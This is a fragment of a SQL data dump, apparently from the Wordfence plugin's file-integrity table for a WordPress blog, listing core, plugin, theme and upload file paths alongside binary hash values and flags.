('\Z䦀��@���B�a�\n2','wp-content/themes/twentytwentyfour/patterns/text-centered-statement-small.php','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/patterns/text-centered-statement-small.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']/��ޙ�n��t�ĸ@�','ʷdb����$��oQۮ�j�R-l����::','',0,'?'),
('\Z�2�\n���)ULE��','wp-content/plugins/elementor/includes/widgets/shortcode.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/widgets/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��9n��}��GR�','�[����fC\"W��D�C�$b�v% $m','',0,'?'),
('\Z����)qtsCI9','wp-includes/functions.php','/var/www/html/ictbank/blog/wp-includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���@)�����<E','�Ei.��pM�gRRL5��R�O�֞��J����','',0,'?'),
('\Z�y��8R#O�y��','wp-admin/css/nav-menus-rtl.css','/var/www/html/ictbank/blog/wp-admin/css/nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�Fن;��d��]�t','l���\ri�;��U.�vy���K\r0b�+w�','',0,'?'),
('\Z�l����\n.)\n@U','wp-content/plugins/elementor-pro/modules/woocommerce/settings/settings-woocommerce.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/settings/settings-woocommerce.php',0,'���cn�1{�ބy�','���cn�1{�ބy�','���:�㢳��0�,��Cvˆpz��͊{!<�h','',0,'?'),
('\Z��\Z:\\��Rf�P�~3','wp-includes/class-wp-metadata-lazyloader.php','/var/www/html/ictbank/blog/wp-includes/class-wp-metadata-lazyloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Rq6}d�l)�ل','KJ`�R��L���G%2�u�u�)+f%','',0,'?'),
('\Z��]އܶ��-�r��','wp-content/plugins/elementor-pro/modules/loop-builder/providers/taxonomy-loop-provider.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/loop-builder/providers/taxonomy-loop-provider.php',0,'-j�@Pl2���T��F�','-j�@Pl2���T��F�','�<�j�6�>f�%>[?�\\f<F������5_�Cr','',0,'?'),
('\Z�UE�s(��#E�p','wp-includes/images/smilies/icon_mrgreen.gif','/var/www/html/ictbank/blog/wp-includes/images/smilies/icon_mrgreen.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),
('\Z�s�[���W-���','wp-content/plugins/elementor/core/editor/loader/v1/editor-v1-loader.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/editor/loader/v1/editor-v1-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�/��Zݍ|���','�]�K&��4�vz��&X��)zDD\"����˹','',0,'?'),
('\Z���/�̓��T%�g4','wp-includes/js/jquery/ui/effect-drop.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/ui/effect-drop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�1m�:����*��','�jճ�:�2��l�϶G��B�%�[�~:v7�','',0,'?'),
('Zl�\Z0���?��-�','wp-content/themes/hello-elementor/includes/settings-functions.php','/var/www/html/ictbank/blog/wp-content/themes/hello-elementor/includes/settings-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ᚫ�Gh\rry��><�','_@j����IU���� ���/r�&���k','',0,'?'),
('\nFNΡ�� ����','wp-content/plugins/wordpress-seo/src/actions/integrations-action.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/actions/integrations-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�BCtR��}��','��Q�\\J�|�`Aw�xJ�C:9�s�n��Ip�5ņ','',0,'?'),
('p9}dZBw�NN�7`m','wp-content/plugins/wordpress-seo/admin/class-meta-columns.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/class-meta-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x)u���4��n�I','H��e�Vݎ��D��D�̦��\\�৲��','',0,'?'),
('$�P�`��\0g�X�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF\\����2���','2k�s��\\>��RI:nH�ȿDm�!zz���','',0,'?'),
('&�������͂|d8�','wp-includes/blocks/pattern.php','/var/www/html/ictbank/blog/wp-includes/blocks/pattern.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��֢�`^�R�I','�m��#��#�L�/S��_�t/� �*�I\\=','',0,'?'),
('+%)�Rߎ����e�j','wp-content/plugins/elementor-pro/assets/js/packages/editor-site-navigation-extended/editor-site-navigation-extended.strings.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/packages/editor-site-navigation-extended/editor-site-navigation-extended.strings.js',0,'��ُ\0�� ��B~','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),
('-��c�<���@�VsZ�','wp-includes/js/api-request.js','/var/www/html/ictbank/blog/wp-includes/js/api-request.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),
('/�D�oW0�b^����','wp-content/plugins/elementor-pro/modules/screenshots/render-mode-screenshot.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/screenshots/render-mode-screenshot.php',0,'x+�.}\nDx0','x+�.}\nDx0','�9��&���3���l���U\r%�2�S0��','',0,'?'),
('2np�7�;�)���','wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-regular-400.ttf','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-regular-400.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ws���!��9�o0���','܅���#|ǘ��ѱVa��K?J�\0%�KI_Vt','',0,'?'),
('6>�Z\re���S�','wp-content/plugins/elementor/core/isolation/plugin-status-adapter-interface.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/isolation/plugin-status-adapter-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�âpOav�i�:��','CdaŬ�ث���=�S����u���7m:�o�','',0,'?'),
('?����?���y\0l','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-activation-error-exception.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-activation-error-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�)X8��/�ˢ�','6�2i�zS�9I��q�R�Q��데��VjU>','',0,'?'),
('^����}\\� �Q�','wp-content/plugins/wordpress-seo/src/presenters/open-graph/description-presenter.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/presenters/open-graph/description-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"1S9jE���K:�+ʊ','�[�K���ؙ8�n����/����/�&cg','',0,'?'),
('_��z���9�݀D:��','wp-includes/blocks/media-text/style.css','/var/www/html/ictbank/blog/wp-includes/blocks/media-text/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\0�~��`�I�}�ģG','�H:+Z�)�(j��\09 ��Upu<��\0>��~e#','',0,'?'),
('a��e1A�Y�\Z�;c','wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�EY����,�Ct��','\n\r����D�I>lЍ~\r���A�����o��','',0,'?'),
('jzϞ�)��A�b셀�','wp-includes/rest-api/endpoints/class-wp-rest-font-families-controller.php','/var/www/html/ictbank/blog/wp-includes/rest-api/endpoints/class-wp-rest-font-families-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P߬�����Д�','�}(0Ff��K:��L* ��#�s��6��bomv�','',0,'?'),
('m��Mp����?i','wp-content/plugins/elementor-pro/modules/woocommerce/widgets/product-add-to-cart.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/widgets/product-add-to-cart.php',0,'�~~��j���z�E','�~~��j���z�E','u��WWͧ�q\"��!8D\'�0�M+j�R���H��','',0,'?'),
('t�]��W2`�,Z','wp-includes/blocks/term-description/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/term-description/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@5��^i����\r�!g',',1УQ�2�@���\nrr��h/Xݔ2H�5�','',0,'?'),
('||<�mx�Nkе(Ɖ','wp-content/plugins/wordfence/css/license/care.1722265817.css','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/css/license/care.1722265817.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�)*���*v�v#h','F�r�:�r�(n�~3�wd�9�R�O�','',0,'?'),
('�=�����Ap��','wp-content/plugins/elementor-pro/modules/notes/data/endpoints/users-endpoint.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/notes/data/endpoints/users-endpoint.php',0,'L�i~)\n�e�,(�w�__','L�i~)\n�e�,(�w�__','�m�K.�<�Q�Ⱦm�θ�#4���?��,V4�o','',0,'?'),
('�Lo��˃�Zh�{�','wp-content/plugins/wordpress-seo/src/helpers/meta-helper.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/helpers/meta-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=8V(�c�Jl�CW��','u���FB�⺴�����|�i�䄃�>�i]��M','',0,'?'),
('���G� ���j#_I','wp-content/plugins/elementor/includes/controls/structure.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/controls/structure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')� I���bk/�','z�b��qp0Nr.lد|�?���hyfN��;��','',0,'?'),
('�y���!�\0pZ�[A','wp-includes/js/mediaelement/mediaelement-and-player.min.js','/var/www/html/ictbank/blog/wp-includes/js/mediaelement/mediaelement-and-player.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�����5��V�','yG#��\n��7�ڌ6�(C�����h���y�','',0,'?'),
('��M\Z�����Q','wp-content/plugins/elementor/includes/widgets/progress.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/widgets/progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�}r$t��j+�g��','EJK����k[3�_y�htKZ����y+���','',0,'?'),
('��E�ȖqȊ?2�H�','wp-includes/js/dist/api-fetch.js','/var/www/html/ictbank/blog/wp-includes/js/dist/api-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�ժ*��o��E�n','��&�#�P_zI��M�K�w�������T����','',0,'?'),
('�5pު�m�\Z��','wp-includes/blocks/separator/editor.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/separator/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٞ�\n��o�\'���','j7W��\0��6�$�e��~RI���p�%zP','',0,'?'),
('���<���|Q���','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-metabox.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�|�5V�h��-VV','!*S]�4p2pG���C�ȱݠ.LeB+%�\"��','',0,'?'),
('�#U���d��,1�','wp-content/plugins/wordpress-seo/src/integrations/front-end/backwards-compatibility.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/integrations/front-end/backwards-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�ܳg\n�i]��R�','&AHo�ns��?̢\\}F�x7g[^����k��Ɉ','',0,'?'),
('�`:�y:��\Zk\r\r)N7','wp-content/plugins/wordpress-seo/images/slack_sharing.png','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/slack_sharing.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���� G�@����w','���X�]͎ ���#)M�,eS\n:\'�9&3���','',0,'?'),
('��T(�8S�A}�','wp-content/uploads/2020/02/cropped-ictbank.ir_-100x100.png','/var/www/html/ictbank/blog/wp-content/uploads/2020/02/cropped-ictbank.ir_-100x100.png',0,'|U��~c.��8m�J','|U��~c.��8m�J','zAcjh��e0+���v0��k,U��fm��s','',0,'?'),
('ֻE\n�<�B�[�,','wp-includes/class-wp-ajax-response.php','/var/www/html/ictbank/blog/wp-includes/class-wp-ajax-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QnK\nθfޞX��� �','�T�#t��E��ȴ|TPUJ����\0�\r�U�O�','',0,'?'),
('�|�aU�8�u�','wp-content/plugins/elementor-pro/core/app/modules/site-editor/assets/js/site-editor.scss','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/app/modules/site-editor/assets/js/site-editor.scss',0,'�CS�/^\0a����4�','�CS�/^\0a����4�','�z�{I0`�r��P8�;�e/w�T�)|\'��$','',0,'?'),
('�����\n���V7 ','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/AppendStream.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/AppendStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c 3ˋ�UOC��#9','k�&#yj�M�A&)�d5U �Bn���5����','',0,'?'),
('�[�\0��Y[cM�{','wp-includes/css/dist/block-library/classic.css','/var/www/html/ictbank/blog/wp-includes/css/dist/block-library/classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��dc5��?�','�����?�\"4�AH�CǓ����_/�','',0,'?'),
('�m��n9�F�6�','wp-admin/css/admin-menu-rtl.css','/var/www/html/ictbank/blog/wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nO��9���T�2�ڹ','e�Z�m#�tFM�F��ʱ#y*�jϏ��%','',0,'?'),
('�֦�Ab.X�q��','wp-content/plugins/wordpress-seo/src/repositories/indexable-cleanup-repository.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/repositories/indexable-cleanup-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɲ;)�<�M�0�ɟ�','�©�ݪ���\r�V��:����&,�N�\"��','',0,'?'),
(')�M��^�ûoz�','wp-admin/images/loading.gif','/var/www/html/ictbank/blog/wp-admin/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K\Z0b:��ד;u�','�V�k�~Բa�b!f�y�lm&v�3�Į��m��','',0,'?'),
('/�\"C�EÚ7kH��','wp-includes/blocks/comments-title/editor.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/comments-title/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �]C�!�|A�JH\0��','��f )�Cھ�KG�\Z�C����ť L��p�','',0,'?'),
('4%�IH�O��ʰ�L','wp-includes/css/media-views.min.css','/var/www/html/ictbank/blog/wp-includes/css/media-views.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�2-������','=��*��A����$ڬj��.*#�:b�%[K�','',0,'?'),
('C�/�;)��ّ�o','wp-admin/js/comment.js','/var/www/html/ictbank/blog/wp-admin/js/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҫ]��ʇQZh��=1','烶� �x����Ѳ�\\�O�\\�nԝnh��^E','',0,'?'),
('H-�F!|�J�+)u','wp-includes/blocks/post-content/editor.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/post-content/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�\rL�&���^T�L','?w@Q����wT�\Z�0��6\n�>�=�h','',0,'?'),
('H��~�\n��x����|','wp-includes/js/dist/token-list.js','/var/www/html/ictbank/blog/wp-includes/js/dist/token-list.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�\0�}���}�','�)?��k�,����`uW���M���Sq��','',0,'?'),
('Lf�:���)��\n���','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-wp.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eٱ��uR����ܱ�]','���7�+y�6Ʉ/-�Ԗ0X.{���^�٨jh','',0,'?'),
('P��f���pM�','wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushColdFusion.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushColdFusion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R.0ki���\n�Z��','9�?��#�7M�4�gvIF.�����+���,��','',0,'?'),
('S��v��]��$ů�','wp-content/plugins/wordpress-seo/src/presentations/indexable-home-page-presentation.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/presentations/indexable-home-page-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����@�;ߡME','*�\ZMl��^\"8��x*����u��+������','',0,'?'),
('T�gslF��ʞ�Ly','wp-admin/js/set-post-thumbnail.min.js','/var/www/html/ictbank/blog/wp-admin/js/set-post-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�P�N�H�9e�@I','e}#����n�q�J�rJ��Q<d��Z�K�4','',0,'?'),
('a�@�WrQw��Z\n.�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܑz�g<N��\n?o6f','���R����Eg�X3��JAc��!a�_��S{','',0,'?'),
('ob���6t�R��?}','wp-content/uploads/2020/02/ictbank2-450x434.png','/var/www/html/ictbank/blog/wp-content/uploads/2020/02/ictbank2-450x434.png',0,'[�u&���c �G#/','[�u&���c �G#/','K4xUv�S��b��|�\"���o���s�yE��','',0,'?'),
('z�|*6�S\\5��3','wp-content/plugins/wordfence/lib/wordfenceScanner.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�|��R-������\nj','m]�b(�\r��t�Ӷ���b����U��ת','',0,'?'),
('�7J0�r\0���)�3�','wp-content/themes/hello-elementor/editor.css','/var/www/html/ictbank/blog/wp-content/themes/hello-elementor/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�&i�H\r\"./','�\Z4���Β>,�4�JC����J�\Z0�}�','',0,'?'),
('�f7�^����YГlwM','wp-includes/Requests/src/Exception/Http/Status502.php','/var/www/html/ictbank/blog/wp-includes/Requests/src/Exception/Http/Status502.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�G��dQ��t�$���%','ap 84�}bj�/A=�c^P\' WwAl�1��','',0,'?'),
('��Y2�t���V>','wp-content/plugins/elementor-pro/modules/popup/assets/images/triggers/inactivity.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/popup/assets/images/triggers/inactivity.svg',0,'3-�5�f\0�-+�ɑ','3-�5�f\0�-+�ɑ','f�G(;�P���\\r�ꄷ-,J�m�Ah&�','',0,'?'),
('����\n^Ҝ�T���','wp-content/plugins/wordpress-seo/src/initializers/crawl-cleanup-permalinks.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/initializers/crawl-cleanup-permalinks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㝓�<�\\��8|s�','��uP]�i)������VF�\r\"�ʍ;��žS�~','',0,'?'),
('��U��ou�e�NTt�','wp-content/themes/twentytwentyfour/patterns/text-centered-statement.php','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/patterns/text-centered-statement.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$nԖ�\\�s�)v��J','�e�M�9�|�+�:������S�?�A��\0','',0,'?'),
('�\n$z�X�`�1Bw','wp-includes/js/tinymce/plugins/charmap/plugin.js','/var/www/html/ictbank/blog/wp-includes/js/tinymce/plugins/charmap/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),
('��=b�6��hs���t','wp-admin/ms-themes.php','/var/www/html/ictbank/blog/wp-admin/ms-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:1R] l�I��!#_J','7�E��H����Pu�����Z�b��G','',0,'?'),
('��\'��FE�A�vQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r��5]xVI�\'�i�','��G��݅\'�!���Y�E�3��P5ad��M��','',0,'?'),
('��I�����UzYWg!g','wp-includes/blocks/latest-comments/style-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/latest-comments/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'��À]�0��','��z]HK���aa�)����2���$���M�','',0,'?'),
('����_<C���3�','wp-content/plugins/elementor/assets/css/app-base.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/app-base.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���DE�i\0�@�-9�3','��J�Z�㊥��5aX�]�a�͋�M\n m��-','',0,'?'),
('�^�u[�p}`B��W1','wp-includes/blocks/table/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/table/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�M���{;r�D�Fy�','#\Z��\nlL��c�S�<�-Voۜ��k��˾��Ʒ','',0,'?'),
('�`��M�aj�jC�E�','wp-content/plugins/elementor/assets/shapes/curve-asymmetrical.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/shapes/curve-asymmetrical.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�r�H�-p�\'u��M','*��\"��(\'wX3\Zl����^�\0:�4q<�;��','',0,'?'),
('ƍp�=Z\0�S_���$','wp-includes/blocks/cover/editor.css','/var/www/html/ictbank/blog/wp-includes/blocks/cover/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ѫ��D�[٤��C','�E�m�Gg�\Z-\\��N�Ybd��N��:87��','',0,'?'),
('�k0B��a��`�','wp-includes/customize/class-wp-customize-nav-menu-setting.php','/var/www/html/ictbank/blog/wp-includes/customize/class-wp-customize-nav-menu-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǜ�\0�5��+�&̺WV','���owҏ]e|�K$��9rs�c�&�/��','',0,'?'),
('��i\':�ו���4R�','wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/MessagesManager.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/MessagesManager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�gu��F/Zn�eB��U','�|l�rJ����2���^�\'���6','',0,'?'),
('�맼]}uP�Cq,��','wp-content/plugins/wordpress-seo/src/integrations/academy-integration.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/integrations/academy-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ծ�d3߉�L-���','K���X�i���e��O� ���������','',0,'?'),
('ܟ�ҿB∶����','wp-includes/js/dist/media-utils.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/media-utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m@�2���c�ۊu��','��1?(���\0Q�tn�X�&��\\aB��/�<�','',0,'?'),
('�-=Q�Cw�tnL�#','wp-content/plugins/wordfence/lib/wfBrowscap.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�\"�+5�Ÿ���H','�,o�v���U�(wd���Ϩ�����O�H�','',0,'?'),
('F�?�;Le�����','wp-content/plugins/elementor/includes/stylesheet.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �B�bLR0�h*ʧ6','����m���X�f��A[#a�&*��HL�)�','',0,'?'),
('͑�}�P�� 0��7','wp-includes/blocks/code/editor-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/code/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\JNPT-�7����]�','���<�/��lU0*ߥW�$V����vC]���4�','',0,'?'),
('\n��O�_��;]/^��','wp-includes/images/down_arrow.gif','/var/www/html/ictbank/blog/wp-includes/images/down_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),
('ν�}�V�+�tB�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��꤀�x�٠�%�cl','N�8,�c����ae����Οi<5p$���','',0,'?'),
('G_bc�.,]&���','wp-admin/js/image-edit.js','/var/www/html/ictbank/blog/wp-admin/js/image-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/Q3�c�t[<��L��','a!P�\r�?+����`�R�g�+q?i�Ǻ_B','',0,'?'),
('Kv�$T�MR����=�','wp-includes/css/dist/edit-post/style.min.css','/var/www/html/ictbank/blog/wp-includes/css/dist/edit-post/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�>��8���N*��','��~�k�Vy�����t5.���~�3�\Z&x�','',0,'?'),
('ˌx�ȷQ�w�`=@\\','wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Interfaces/Listener.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Interfaces/Listener.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bi�Y)�4�G��','�\0�D5@t����%e��^���k��\".','',0,'?'),
('5�e�ɂ�3Ze��+','wp-content/uploads/2021/12/banner01-280x180.png','/var/www/html/ictbank/blog/wp-content/uploads/2021/12/banner01-280x180.png',0,'��\ZJ�E0;h��t�','��\ZJ�E0;h��t�','�v�-�G��,PVS��:йD�^k�}�P','',0,'?'),
('6��e�9�!���z~','wp-content/plugins/wordpress-seo/src/editors/application/site/website-information-repository.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/editors/application/site/website-information-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b=������N�X�<�','�0ʣ�b���6����MM�%Y��\'8\'6M','',0,'?'),
('@4O���8���h','wp-content/plugins/elementor-pro/modules/display-conditions/conditions/base/archive-condition-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/display-conditions/conditions/base/archive-condition-base.php',0,'1����\0�sP�>�\ZXu','1����\0�sP�>�\ZXu','��&����~ԙ�iT8��!�1���<|�6~$r','',0,'?'),
('A����( gS-��','wp-content/plugins/wordpress-seo/src/user-meta/framework/custom-meta/inclusive-language-analysis-disable.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/user-meta/framework/custom-meta/inclusive-language-analysis-disable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yNyw��h-�i���c','�j�1!Ԩ�^����{\Z,PwPp��k*d)~o','',0,'?'),
('K���C���{��b7','wp-content/plugins/syntaxhighlighter/syntaxhighlighter.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�����n>�Fi�N','�w�u#����nNa+�}.�������2V���','',0,'?'),
('O�ں�^�8�Kq���','wp-content/plugins/wordpress-seo/src/helpers/schema/language-helper.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/helpers/schema/language-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�.�@��ʝ2���6w','�| �\n��\\T����5^�Г>h�˅�q=�B','',0,'?'),
